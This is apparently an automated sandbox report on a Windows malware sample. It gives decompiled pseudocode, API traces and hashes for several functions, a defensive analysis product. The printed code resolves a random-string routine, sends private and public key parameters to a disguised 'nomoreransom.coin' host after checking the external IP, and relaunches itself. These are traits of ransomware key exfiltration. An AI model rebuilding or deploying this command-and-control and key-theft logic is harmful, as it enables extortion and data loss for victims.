                                          • Part of subcall function 0FC65D70: _memset.LIBCMT ref: 0FC65D9D
                                        • CryptBinaryToStringA.CRYPT32(?,-00000012,40000001,?,?), ref: 0FC65C26
                                        • GetLastError.KERNEL32 ref: 0FC65C30
                                        • lstrlenA.KERNEL32(?), ref: 0FC65C37
                                        • VirtualAlloc.KERNEL32(00000000,00000002,00003000,00000040), ref: 0FC65C46
                                        • lstrlenA.KERNEL32(?), ref: 0FC65C51
                                        • lstrlenA.KERNEL32(?), ref: 0FC65C71
                                        • lstrlenA.KERNEL32(?), ref: 0FC65C94
                                        • lstrlenA.KERNEL32(00000000), ref: 0FC65CA3
                                        • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,00000000), ref: 0FC65CB4
                                        • VirtualFree.KERNEL32(?,00000000,00008000), ref: 0FC65CE7
                                        • VirtualFree.KERNEL32(?,00000000,00008000), ref: 0FC65CF4
                                        • VirtualFree.KERNEL32(?,00000000,00008000), ref: 0FC65D01
                                        • VirtualFree.KERNEL32(?,00000000,00008000), ref: 0FC65D26
                                        • VirtualFree.KERNEL32(?,00000000,00008000), ref: 0FC65D33
                                        • VirtualFree.KERNEL32(?,00000000,00008000), ref: 0FC65D40
                                        • VirtualFree.KERNEL32(?,00000000,00008000), ref: 0FC65D5A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.537524053.000000000FC61000.00000020.00000001.01000000.00000003.sdmp, Offset: 0FC60000, based on PE: true
                                        • Associated: 00000001.00000002.537517635.000000000FC60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000001.00000002.537541962.000000000FC6A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000001.00000002.537565986.000000000FC72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000001.00000002.537573813.000000000FC74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_fc60000_gI5xZdIxUs.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrlen$Virtual$Alloc$Free$lstrcat$BinaryByteCharCryptMultiStringWide$Name_memset$CloseComputerErrorHeapLastOpenProcessQueryUserValuewsprintf
                                        • String ID: #shasj$&priv_key=$&pub_key=$&version=2.3r$action=call&
                                        • API String ID: 2781787645-472827701
                                        • Opcode ID: 4ebc019ab4199d1a4a2ec8a0be1361622fb489ff3610be888405083c0952f964
                                        • Instruction ID: 6640bade141ef743ca6347b5620a71077563d6e7125fdf7c890f93923689be12
                                        • Opcode Fuzzy Hash: 4ebc019ab4199d1a4a2ec8a0be1361622fb489ff3610be888405083c0952f964
                                        • Instruction Fuzzy Hash: 18E1AB7110C302AFD710DF25DC82B6BBBE5EF88714F14492CF685A7291D774AA05CBA6
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0FC67EF0 Relevance: 45.6, APIs: 13, Strings: 13, Instructions: 131networkfilememoryCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        C-Code - Quality: 100%
                                        			E0FC67EF0(void* __ecx, long _a4, intOrPtr _a8, void* _a12, long _a16, void* _a20, intOrPtr _a24, WCHAR* _a36, WCHAR* _a40, long _a44) {
				long _v12;
				void* _v16;
				void* _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				short _v68;
				void* _t38;
				void* _t40;
				WCHAR* _t41;
				long _t54;
				long _t59;
				WCHAR* _t62;
				void* _t63;
				void* _t64;
				void* _t65;
				void* _t67;

				_t64 = __ecx;
				_t38 =  *(__ecx + 4);
				if(_t38 != 0) {
					InternetCloseHandle(_t38);
				}
				E0FC67CE0(_t64); // executed
				_t40 = InternetConnectW( *(_t64 + 4), _a4, 0x50, 0, 0, 3, 0, 0); // executed
				_t65 = _t40;
				_v12 = 0;
				_v16 = _t65;
				if(_t65 != 0) {
					_t41 = VirtualAlloc(0, 0x2800, 0x3000, 0x40); // executed
					_t62 = _t41;
					_v20 = _t62;
					wsprintfW(_t62, L"%s", _a8);
					_t63 = HttpOpenRequestW(_t65, _a36, _t62, L"HTTP/1.1", 0, 0, 0x8404f700, 0);
					if(_t63 != 0) {
						_v68 = 0x6f0048;
						_v64 = 0x740073;
						_v60 = 0x20003a;
						_v56 = 0x6f006e;
						_v52 = 0x6f006d;
						_v48 = 0x650072;
						_v44 = 0x610072;
						_v40 = 0x73006e;
						_v36 = 0x6d006f;
						_v32 = 0x63002e;
						_v28 = 0x69006f;
						_v24 = 0x6e;
						if(HttpAddRequestHeadersW(_t63,  &_v68, 0xffffffff, 0) != 0) {
							if(HttpSendRequestW(_t63, _a40, _a44, _a12, _a16) == 0) {
								GetLastError();
							} else {
								_t67 = _a20;
								_t59 = _a24 - 1;
								_a4 = 0;
								if(InternetReadFile(_t63, _t67, _t59,  &_a4) != 0) {
									while(1) {
										_t54 = _a4;
										if(_t54 == 0) {
											goto L13;
										}
										 *((char*)(_t54 + _t67)) = 0;
										_a4 = 0;
										_v12 = 1;
										if(InternetReadFile(_t63, _t67, _t59,  &_a4) != 0) {
											continue;
										} else {
										}
										goto L13;
									}
								}
							}
						}
					}
					L13:
					InternetCloseHandle(_t63); // executed
					InternetCloseHandle(_v16);
					VirtualFree(_v20, 0, 0x8000); // executed
					return _v12;
				} else {
					return _t40;
				}
			}




























                                        0x0fc67ef8
                                        0x0fc67efb
                                        0x0fc67f00
                                        0x0fc67f03
                                        0x0fc67f03
                                        0x0fc67f0b
                                        0x0fc67f22
                                        0x0fc67f28
                                        0x0fc67f2a
                                        0x0fc67f31
                                        0x0fc67f36
                                        0x0fc67f4f
                                        0x0fc67f58
                                        0x0fc67f60
                                        0x0fc67f63
                                        0x0fc67f87
                                        0x0fc67f8b
                                        0x0fc67f98
                                        0x0fc67fa1
                                        0x0fc67fa8
                                        0x0fc67faf
                                        0x0fc67fb6
                                        0x0fc67fbd
                                        0x0fc67fc4
                                        0x0fc67fcb
                                        0x0fc67fd2
                                        0x0fc67fd9
                                        0x0fc67fe0
                                        0x0fc67fe7
                                        0x0fc67ff6
                                        0x0fc6800d
                                        0x0fc6805c
                                        0x0fc6800f
                                        0x0fc68015
                                        0x0fc68018
                                        0x0fc6801d
                                        0x0fc6802c
                                        0x0fc68030
                                        0x0fc68030
                                        0x0fc68035
                                        0x00000000
                                        0x00000000
                                        0x0fc68037
                                        0x0fc68042
                                        0x0fc68049
                                        0x0fc68058
                                        0x00000000
                                        0x00000000
                                        0x0fc6805a
                                        0x00000000
                                        0x0fc68058
                                        0x0fc68030
                                        0x0fc6802c
                                        0x0fc6800d
                                        0x0fc67ff6
                                        0x0fc68062
                                        0x0fc68069
                                        0x0fc6806e
                                        0x0fc6807a
                                        0x0fc68089
                                        0x0fc67f3e
                                        0x0fc67f3e
                                        0x0fc67f3e

                                        APIs
                                        • InternetCloseHandle.WININET(?), ref: 0FC67F03
                                        • InternetConnectW.WININET(?,00000000,00000050,00000000,00000000,00000003,00000000,00000000), ref: 0FC67F22
                                        • VirtualAlloc.KERNEL32(00000000,00002800,00003000,00000040,?,?,?,?,?,?,?,?,?,0FC66EE6,ipv4bot.whatismyipaddress.com,0FC6FF10), ref: 0FC67F4F
                                        • wsprintfW.USER32 ref: 0FC67F63
                                        • HttpOpenRequestW.WININET(00000000,?,00000000,HTTP/1.1,00000000,00000000,8404F700,00000000), ref: 0FC67F81
                                        • HttpAddRequestHeadersW.WININET(00000000,?,000000FF,00000000), ref: 0FC67FEE
                                        • HttpSendRequestW.WININET(00000000,00650072,006F006D,00000000,0000006E), ref: 0FC68005
                                        • InternetReadFile.WININET(00000000,0069006F,0063002D,00000000), ref: 0FC68024
                                        • InternetReadFile.WININET(00000000,0069006F,0063002D,00000000), ref: 0FC68050
                                        • GetLastError.KERNEL32 ref: 0FC6805C
                                        • InternetCloseHandle.WININET(00000000), ref: 0FC68069
                                        • InternetCloseHandle.WININET(00000000), ref: 0FC6806E
                                        • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,?,?,?,0FC66EE6), ref: 0FC6807A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.537524053.000000000FC61000.00000020.00000001.01000000.00000003.sdmp, Offset: 0FC60000, based on PE: true
                                        • Associated: 00000001.00000002.537517635.000000000FC60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000001.00000002.537541962.000000000FC6A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000001.00000002.537565986.000000000FC72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000001.00000002.537573813.000000000FC74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_fc60000_gI5xZdIxUs.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Internet$CloseHandleHttpRequest$FileReadVirtual$AllocConnectErrorFreeHeadersLastOpenSendwsprintf
                                        • String ID: .$:$H$HTTP/1.1$m$n$n$n$o$o$r$r$s
                                        • API String ID: 3906118045-3956618741
                                        • Opcode ID: 676a1be4d34343ce26236f9e9aa56cd03e5e6b799cb4470f38a2567c478210bd
                                        • Instruction ID: 3458bdc3a3d7790f4070b897b99bc738b22eda61b2be8f4755e5ea52edc4649f
                                        • Opcode Fuzzy Hash: 676a1be4d34343ce26236f9e9aa56cd03e5e6b799cb4470f38a2567c478210bd
                                        • Instruction Fuzzy Hash: 2C416031604209BBEB209F51DC8AFAE7FB9FF04B55F104119FA04B62C1CBB599548BA4
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0FC64950 Relevance: 40.4, APIs: 22, Strings: 1, Instructions: 182threadsleepmemoryCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        C-Code - Quality: 100%
                                        			E0FC64950() {
				void* _v8;
				void* _v12;
				CHAR* _v16;
				int _v20;
				void* _v24;
				int _v28;
				void* _v32;
				int _v36;
				int _v40;
				int _v44;
				int _v48;
				int _v52;
				int _v60;
				char _v80;
				void* _t54;
				void* _t55;
				int _t79;
				void* _t81;
				short* _t97;
				void* _t114;

				Sleep(0x3e8); // executed
				_t54 = E0FC64600(_t90, _t106); // executed
				if(_t54 == 0) {
					_t55 = CreateThread(0, 0, E0FC62D30, 0, 0, 0); // executed
					_v8 = _t55;
					if(_v8 != 0) {
						if(WaitForSingleObject(_v8, 0x1388) == 0x102) {
							_t90 = _v8;
							TerminateThread(_v8, 0);
						}
						_t106 = _v8;
						CloseHandle(_v8); // executed
					}
					E0FC646F0(); // executed
					E0FC640E0(_t90, _t106);
					E0FC66420( &_v80); // executed
					_v40 = 0;
					_v36 = 0;
					_v28 = 0;
					_v44 = 0;
					E0FC663D0( &_v80,  &_v28,  &_v44,  &_v40,  &_v36);
					_v48 = 0;
					_v16 = 0;
					if(E0FC64930(_v28) == 0) {
						while(_v48 == 0) {
							_t81 = E0FC65880(_v28, _v44, _v40, _v36,  &_v16); // executed
							_t114 = _t114 + 0xc;
							if(_t81 != 0) {
								_v48 = 1;
							} else {
								Sleep(0x2710);
							}
						}
						E0FC66390( &_v80);
						_v32 = 0;
						_v20 = 0;
						_v52 = 0;
						_v60 = 0;
						__eflags = _v16;
						if(_v16 == 0) {
							L19:
							E0FC64030();
							InitializeCriticalSection(0xfc72a48);
							__eflags = _v52;
							if(__eflags == 0) {
								E0FC63E20( &_v80);
							} else {
								E0FC64000(_v32, _v20, __eflags);
							}
							DeleteCriticalSection(0xfc72a48);
							__eflags = E0FC63AA0();
							if(__eflags != 0) {
								E0FC643E0(__eflags);
							}
							_v24 = VirtualAlloc(0, 0x200, 0x3000, 4);
							__eflags = _v24;
							if(__eflags != 0) {
								GetModuleFileNameW(0, _v24, 0x100);
								E0FC63BE0(_v24, _v24, __eflags);
								VirtualFree(_v24, 0, 0x8000);
							}
							__eflags =  *0xfc72a44;
							if( *0xfc72a44 != 0) {
								_t97 =  *0xfc72a44; // 0x60000
								ShellExecuteW(0, L"open", _t97, 0, 0, 5);
							}
							ExitThread(0);
						}
						_v20 = lstrlenA(_v16);
						_v32 = VirtualAlloc(0, _v20, 0x3000, 4);
						_t79 = CryptStringToBinaryA(_v16, 0, 1, _v32,  &_v20, 0, 0);
						__eflags = _t79;
						if(_t79 != 0) {
							_v52 = 1;
							goto L19;
						}
						ExitProcess(0);
					} else {
						_v12 = VirtualAlloc(0, 0x200, 0x3000, 4);
						_t119 = _v12;
						if(_v12 != 0) {
							GetModuleFileNameW(0, _v12, 0x100);
							E0FC63BE0(_v12,  &_v44, _t119);
							VirtualFree(_v12, 0, 0x8000);
						}
						ExitProcess(0);
					}
				}
				ExitProcess(0);
			}























                                        0x0fc6495b
                                        0x0fc64961
                                        0x0fc64968
                                        0x0fc64981
                                        0x0fc64987
                                        0x0fc6498e
                                        0x0fc649a4
                                        0x0fc649a8
                                        0x0fc649ac
                                        0x0fc649ac
                                        0x0fc649b2
                                        0x0fc649b6
                                        0x0fc649b6
                                        0x0fc649bc
                                        0x0fc649c1
                                        0x0fc649c9
                                        0x0fc649ce
                                        0x0fc649d5
                                        0x0fc649dc
                                        0x0fc649e3
                                        0x0fc649fd
                                        0x0fc64a02
                                        0x0fc64a09
                                        0x0fc64a1a
                                        0x0fc64a6b
                                        0x0fc64a83
                                        0x0fc64a88
                                        0x0fc64a8d
                                        0x0fc64a9c
                                        0x0fc64a8f
                                        0x0fc64a94
                                        0x0fc64a94
                                        0x0fc64aa3
                                        0x0fc64aa8
                                        0x0fc64aad
                                        0x0fc64ab4
                                        0x0fc64abb
                                        0x0fc64ac2
                                        0x0fc64ac9
                                        0x0fc64acd
                                        0x0fc64b1f
                                        0x0fc64b1f
                                        0x0fc64b29
                                        0x0fc64b2f
                                        0x0fc64b33
                                        0x0fc64b45
                                        0x0fc64b35
                                        0x0fc64b3b
                                        0x0fc64b3b
                                        0x0fc64b4f
                                        0x0fc64b5a
                                        0x0fc64b5c
                                        0x0fc64b5e
                                        0x0fc64b5e
                                        0x0fc64b77
                                        0x0fc64b7a
                                        0x0fc64b7e
                                        0x0fc64b8b
                                        0x0fc64b94
                                        0x0fc64ba4
                                        0x0fc64ba4
                                        0x0fc64baa
                                        0x0fc64bb1
                                        0x0fc64bb9
                                        0x0fc64bc7
                                        0x0fc64bc7
                                        0x0fc64bcf
                                        0x0fc64bcf
                                        0x0fc64ad9
                                        0x0fc64aef
                                        0x0fc64b06
                                        0x0fc64b0c
                                        0x0fc64b0e
                                        0x0fc64b18
                                        0x00000000
                                        0x0fc64b18
                                        0x0fc64b12
                                        0x0fc64a1c
                                        0x0fc64a30
                                        0x0fc64a33
                                        0x0fc64a37
                                        0x0fc64a44
                                        0x0fc64a4d
                                        0x0fc64a5d
                                        0x0fc64a5d
                                        0x0fc64a65
                                        0x0fc64a65
                                        0x0fc64a1a
                                        0x0fc6496c

                                        APIs
                                        • Sleep.KERNEL32(000003E8), ref: 0FC6495B
                                          • Part of subcall function 0FC64600: VirtualAlloc.KERNEL32(00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0FC6465C
                                          • Part of subcall function 0FC64600: lstrcpyW.KERNEL32 ref: 0FC6467F
                                          • Part of subcall function 0FC64600: lstrlenW.KERNEL32(00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0FC64686
                                          • Part of subcall function 0FC64600: CreateMutexW.KERNEL32(00000000,00000000,00000000,00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0FC6469E
                                          • Part of subcall function 0FC64600: GetLastError.KERNEL32(?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0FC646AA
                                          • Part of subcall function 0FC64600: GetLastError.KERNEL32(?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0FC646B1
                                          • Part of subcall function 0FC64600: VirtualFree.KERNELBASE(00000000,00000000,00008000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0FC646CB
                                        • ExitProcess.KERNEL32 ref: 0FC6496C
                                        • CreateThread.KERNEL32 ref: 0FC64981
                                        • WaitForSingleObject.KERNEL32(00000000,00001388), ref: 0FC64999
                                        • TerminateThread.KERNEL32(00000000,00000000), ref: 0FC649AC
                                        • CloseHandle.KERNEL32(00000000), ref: 0FC649B6
                                        • VirtualAlloc.KERNEL32(00000000,00000200,00003000,00000004,00000000,00000000,00000000,00000000), ref: 0FC64A2A
                                        • GetModuleFileNameW.KERNEL32(00000000,00000000,00000100), ref: 0FC64A44
                                        • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0FC64A5D
                                        • ExitProcess.KERNEL32 ref: 0FC64A65
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.537524053.000000000FC61000.00000020.00000001.01000000.00000003.sdmp, Offset: 0FC60000, based on PE: true
                                        • Associated: 00000001.00000002.537517635.000000000FC60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000001.00000002.537541962.000000000FC6A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000001.00000002.537565986.000000000FC72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000001.00000002.537573813.000000000FC74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_fc60000_gI5xZdIxUs.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Virtual$AllocCreateErrorExitFreeLastProcessThread$CloseFileHandleModuleMutexNameObjectSingleSleepTerminateWaitlstrcpylstrlen
                                        • String ID: open
                                        • API String ID: 1803241880-2758837156
                                        • Opcode ID: 8cf060bb61fa9a09d8e094c97f46cc5850f79e57ec363523280a47177bd68d58
                                        • Instruction ID: 555a83c77560012020d4caa95d4e55fe54969427f751ac56659cd01f5e7902af
                                        • Opcode Fuzzy Hash: 8cf060bb61fa9a09d8e094c97f46cc5850f79e57ec363523280a47177bd68d58
                                        • Instruction Fuzzy Hash: 4871EE70A48305EBEB14DFA5DC9BFEE7775AB48712F104114E7017A1C1DBB86A44CB64
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0FC68150 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 111encryptionlibrarymemoryCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 410 fc68150-fc68175 CryptAcquireContextW 411 fc6817b-fc6817d 410->411 412 fc68269-fc68271 410->412 413 fc68180-fc6818c 411->413 413->413 414 fc6818e-fc681a5 VirtualAlloc 413->414 415 fc68272-fc68293 CryptReleaseContext VirtualFree 414->415 416 fc681ab-fc681ad 414->416 416->415 417 fc681b3-fc681f7 GetModuleHandleA 416->417 418 fc68207-fc68214 GetProcAddress 417->418 419 fc681f9-fc68205 LoadLibraryA 417->419 420 fc6824e 418->420 421 fc68216-fc6821f 418->421 419->418 419->420 422 fc68250-fc68263 CryptReleaseContext VirtualFree 420->422 421->420 424 fc68221-fc68225 421->424 422->412 425 fc68247-fc6824c 424->425 426 fc68227-fc6822a 424->426 425->422 427 fc68231-fc68245 426->427 427->425 427->427
                                        C-Code - Quality: 66%
                                        			E0FC68150(intOrPtr __ecx, void* __edx) {
				long* _v8;
				intOrPtr _v12;
				signed int _v16;
				char _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				char _v34;
				short _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				char _v48;
				long** _t37;
				void* _t40;
				struct HINSTANCE__* _t45;
				_Unknown_base(*)()* _t46;
				signed int _t54;
				long _t55;
				intOrPtr _t56;
				signed int _t58;
				signed int _t60;
				void* _t63;
				void* _t64;
				void* _t65;

				_t54 = 0;
				_v12 = __ecx;
				_t37 =  &_v8;
				_t63 = __edx;
				__imp__CryptAcquireContextW(_t37, 0, 0, 1, 0xf0000000); // executed
				if(_t37 == 0) {
					L15:
					return _t54;
				} else {
					_t58 = 0;
					do {
						_t3 = _t58 + 0x61; // 0x61
						 *((short*)(_t65 + _t58 * 2 - 0x64)) = _t3;
						_t58 = _t58 + 1;
					} while (_t58 < 0x1a);
					_t7 = _t63 + 1; // 0x1
					_t55 = _t7;
					_t40 = VirtualAlloc(0, _t55, 0x3000, 0x40); // executed
					_t64 = _t40;
					if(_t64 == 0 || _t63 >= _t55) {
						CryptReleaseContext(_v8, 0);
						VirtualFree(_t64, 0, 0x8000);
						return 0;
					} else {
						_v48 = 0x70797243;
						_v44 = 0x6e654774;
						_v40 = 0x646e6152;
						_v36 = 0x6d6f;
						_v34 = 0;
						_v32 = 0x61766441;
						_v28 = 0x32336970;
						_v24 = 0x6c6c642e;
						_v20 = 0;
						_t45 = GetModuleHandleA( &_v32);
						if(_t45 != 0) {
							L7:
							_t19 =  &_v48; // 0x70797243
							_t46 = GetProcAddress(_t45, _t19);
							if(_t46 == 0) {
								goto L13;
							} else {
								_push(_t64);
								_push(_t63);
								_push(_v8);
								if( *_t46() == 0) {
									goto L13;
								} else {
									_t60 = 0;
									if(_t63 != 0) {
										_t56 = _v12;
										_v16 = 0x1a;
										do {
											asm("cdq");
											 *((short*)(_t56 + _t60 * 2)) =  *((intOrPtr*)(_t65 + ( *(_t64 + _t60) & 0x000000ff) % _v16 * 2 - 0x64));
											_t60 = _t60 + 1;
										} while (_t60 < _t63);
									}
									_t54 = 1;
								}
							}
						} else {
							_t18 =  &_v32; // 0x61766441
							_t45 = LoadLibraryA(_t18);
							if(_t45 == 0) {
								L13:
								_t54 = 0;
							} else {
								goto L7;
							}
						}
						CryptReleaseContext(_v8, 0);
						VirtualFree(_t64, 0, 0x8000); // executed
						goto L15;
					}
				}
			}



























                                        0x0fc68160
                                        0x0fc68162
                                        0x0fc68167
                                        0x0fc6816a
                                        0x0fc6816d
                                        0x0fc68175
                                        0x0fc68269
                                        0x0fc68271
                                        0x0fc6817b
                                        0x0fc6817b
                                        0x0fc68180
                                        0x0fc68180
                                        0x0fc68183
                                        0x0fc68188
                                        0x0fc68189
                                        0x0fc68195
                                        0x0fc68195
                                        0x0fc6819b
                                        0x0fc681a1
                                        0x0fc681a5
                                        0x0fc68277
                                        0x0fc68285
                                        0x0fc68293
                                        0x0fc681b3
                                        0x0fc681b6
                                        0x0fc681be
                                        0x0fc681c5
                                        0x0fc681cc
                                        0x0fc681d2
                                        0x0fc681d6
                                        0x0fc681dd
                                        0x0fc681e4
                                        0x0fc681eb
                                        0x0fc681ef
                                        0x0fc681f7
                                        0x0fc68207
                                        0x0fc68207
                                        0x0fc6820c
                                        0x0fc68214
                                        0x00000000
                                        0x0fc68216
                                        0x0fc68216
                                        0x0fc68217
                                        0x0fc68218
                                        0x0fc6821f
                                        0x00000000
                                        0x0fc68221
                                        0x0fc68221
                                        0x0fc68225
                                        0x0fc68227
                                        0x0fc6822a
                                        0x0fc68231
                                        0x0fc68235
                                        0x0fc6823e
                                        0x0fc68242
                                        0x0fc68243
                                        0x0fc68231
                                        0x0fc68247
                                        0x0fc68247
                                        0x0fc6821f
                                        0x0fc681f9
                                        0x0fc681f9
                                        0x0fc681fd
                                        0x0fc68205
                                        0x0fc6824e
                                        0x0fc6824e
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0fc68205
                                        0x0fc68255
                                        0x0fc68263
                                        0x00000000
                                        0x0fc68263
                                        0x0fc681a5

                                        APIs
                                        • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000,00000000,00000000,00000000), ref: 0FC6816D
                                        • VirtualAlloc.KERNEL32(00000000,00000001,00003000,00000040), ref: 0FC6819B
                                        • GetModuleHandleA.KERNEL32(?), ref: 0FC681EF
                                        • LoadLibraryA.KERNEL32(Advapi32.dll), ref: 0FC681FD
                                        • GetProcAddress.KERNEL32(00000000,CryptGenRandomAdvapi32.dll), ref: 0FC6820C
                                        • CryptReleaseContext.ADVAPI32(?,00000000), ref: 0FC68255
                                        • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0FC68263
                                        • CryptReleaseContext.ADVAPI32(?,00000000), ref: 0FC68277
                                        • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0FC68285
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.537524053.000000000FC61000.00000020.00000001.01000000.00000003.sdmp, Offset: 0FC60000, based on PE: true
                                        • Associated: 00000001.00000002.537517635.000000000FC60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000001.00000002.537541962.000000000FC6A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000001.00000002.537565986.000000000FC72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000001.00000002.537573813.000000000FC74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_fc60000_gI5xZdIxUs.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ContextCryptVirtual$FreeRelease$AcquireAddressAllocHandleLibraryLoadModuleProc
                                        • String ID: Advapi32.dll$CryptGenRandomAdvapi32.dll
                                        • API String ID: 3996966626-2152921537
                                        • Opcode ID: 15f58e8e8a7653a9d91a90aa0e17f37926508452ba5aae16b574adaeea8470ff
                                        • Instruction ID: b1a00cf03c9581bfdc5dcd7a0afa047b6ba3549bd557542fbea6b59d584b133e
                                        • Opcode Fuzzy Hash: 15f58e8e8a7653a9d91a90aa0e17f37926508452ba5aae16b574adaeea8470ff
                                        • Instruction Fuzzy Hash: CD31EC75A0820AEFDB108FE5DC87BEEBB78FF04715F104069EA02B6181D775AA11CB65
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0FC682A0 Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 96encryptionlibrarymemoryCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 75%
                                        			E0FC682A0(intOrPtr __ecx, intOrPtr __edx) {
				long* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				char _v34;
				short _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				char _v48;
				long** _t25;
				void* _t28;
				struct HINSTANCE__* _t33;
				_Unknown_base(*)()* _t34;
				long _t40;
				void* _t42;
				void* _t46;
				void* _t47;
				void* _t48;

				_t46 = 0;
				_v16 = __ecx;
				_t25 =  &_v8;
				_v12 = __edx;
				__imp__CryptAcquireContextW(_t25, 0, 0, 1, 0xf0000000); // executed
				if(_t25 == 0) {
					L10:
					return _t46;
				} else {
					_t42 = 0;
					do {
						_t4 = _t42 + 0x61; // 0x61
						 *((char*)(_t48 + _t42 - 0x38)) = _t4;
						_t42 = _t42 + 1;
					} while (_t42 < 0x1a);
					_t40 = __edx + 1;
					_t28 = VirtualAlloc(0, _t40, 0x3000, 0x40); // executed
					_t47 = _t28;
					if(_t47 == 0 || _v12 >= _t40) {
						CryptReleaseContext(_v8, 0);
						VirtualFree(_t47, 0, 0x8000);
						return 0;
					} else {
						_v48 = 0x70797243;
						_v44 = 0x6e654774;
						_v40 = 0x646e6152;
						_v36 = 0x6d6f;
						_v34 = 0;
						_v32 = 0x61766441;
						_v28 = 0x32336970;
						_v24 = 0x6c6c642e;
						_v20 = 0;
						_t33 = GetModuleHandleA( &_v32);
						if(_t33 != 0) {
							L7:
							_t19 =  &_v48; // 0x70797243
							_t34 = GetProcAddress(_t33, _t19);
							if(_t34 != 0) {
								 *_t34(_v8, _v12, _v16);
								_t46 =  !=  ? 1 : _t46;
							}
						} else {
							_t18 =  &_v32; // 0x61766441
							_t33 = LoadLibraryA(_t18);
							if(_t33 != 0) {
								goto L7;
							}
						}
						CryptReleaseContext(_v8, 0);
						VirtualFree(_t47, 0, 0x8000); // executed
						goto L10;
					}
				}
			}
























                                        0x0fc682b0
                                        0x0fc682b2
                                        0x0fc682b7
                                        0x0fc682bd
                                        0x0fc682c0
                                        0x0fc682c8
                                        0x0fc68392
                                        0x0fc6839a
                                        0x0fc682ce
                                        0x0fc682ce
                                        0x0fc682d0
                                        0x0fc682d0
                                        0x0fc682d3
                                        0x0fc682d7
                                        0x0fc682d8
                                        0x0fc682e4
                                        0x0fc682e8
                                        0x0fc682ee
                                        0x0fc682f2
                                        0x0fc683a0
                                        0x0fc683ae
                                        0x0fc683bc
                                        0x0fc68301
                                        0x0fc68304
                                        0x0fc6830c
                                        0x0fc68313
                                        0x0fc6831a
                                        0x0fc68320
                                        0x0fc68324
                                        0x0fc6832b
                                        0x0fc68332
                                        0x0fc68339
                                        0x0fc6833d
                                        0x0fc68345
                                        0x0fc68355
                                        0x0fc68355
                                        0x0fc6835a
                                        0x0fc68362
                                        0x0fc6836d
                                        0x0fc68376
                                        0x0fc68376
                                        0x0fc68347
                                        0x0fc68347
                                        0x0fc6834b
                                        0x0fc68353
                                        0x00000000
                                        0x00000000
                                        0x0fc68353
                                        0x0fc6837e
                                        0x0fc6838c
                                        0x00000000
                                        0x0fc6838c
                                        0x0fc682f2

                                        APIs
                                        • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000,00000000,00000000,00000000), ref: 0FC682C0
                                        • VirtualAlloc.KERNEL32(00000000,00000007,00003000,00000040), ref: 0FC682E8
                                        • GetModuleHandleA.KERNEL32(?), ref: 0FC6833D
                                        • LoadLibraryA.KERNEL32(Advapi32.dll), ref: 0FC6834B
                                        • GetProcAddress.KERNEL32(00000000,CryptGenRandomAdvapi32.dll), ref: 0FC6835A
